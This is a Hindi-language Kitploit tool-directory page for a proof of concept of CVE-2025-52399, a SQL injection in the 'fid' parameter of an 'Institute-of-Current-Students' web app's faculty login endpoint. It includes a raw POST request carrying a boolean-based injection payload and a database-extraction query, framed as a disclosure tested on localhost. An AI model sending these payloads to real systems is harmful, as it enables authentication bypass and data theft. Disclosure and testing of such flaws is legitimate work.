Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-52399-SQLi-Institute-of-Current-Students — CVE-2025-52399 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Institute-of-Current-Students में fid पैरामीटर के माध्यम से SQL injection, authentication bypass और data extraction सक्षम करना। | Kitploit
उपकरण/GitHubGitHub/userr404/cve-2025-52399-sqli-institute-of-current-students
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubuserr404/cve-2025-52399-sqli-institute-of-current-students

CVE-2025-52399-SQLi-Institute-of-Current-Students

CVE-2025-52399 के लिए प्रूफ-ऑफ-कॉन्सेप्ट: Institute-of-Current-Students में fid पैरामीटर के माध्यम से SQL injection, authentication bypass और data extraction सक्षम करना।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

CVE-2025-52399 - वर्तमान छात्र संस्थान में SQL इंजेक्शन

सारांश

Institute-of-Current-Students एप्लिकेशन में loginlinkfaculty एंडपॉइंट fid POST पैरामीटर के माध्यम से SQL इंजेक्शन के प्रति संवेदनशील है। SQL क्वेरी में उपयोग करने से पहले पैरामीटर को ठीक से स्वच्छ नहीं किया जाता, जिससे दूरस्थ हमलावर मनमानी SQL कमांड निष्पादित कर सकते हैं।

  • भेद्यता प्रकार: SQL इंजेक्शन
  • प्रभावित घटक: /loginlinkfaculty (POST)
  • प्रभावित पैरामीटर: fid
  • प्रमाणीकरण: आवश्यक नहीं
  • प्रभाव: प्रमाणीकरण बाईपास, डेटा निष्कर्षण
  • परीक्षण किया गया: लोकलहोस्ट
  • डेटाबेस: icsnew
  • संस्करण: 1.0

PoC

HTTP अनुरोध

root@kitploit:~
POST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example

पेलोड परिणाम

✅ -1' OR 3*2*1=6 AND 000942=000942 -- → सत्य ❌ -1' OR 2*3=4 AND 000942=000942 -- → असत्य

डेटाबेस निष्कर्षण

SELECT database(); -- returns 'icsnew'

संदर्भ

  • CVE-2025-52399 (MITRE)
  • संवेदनशील एप्लिकेशन
  • OWASP SQL इंजेक्शन

खोजकर्ता

Isroil Mustafoqulov

टूल डाउनलोड करें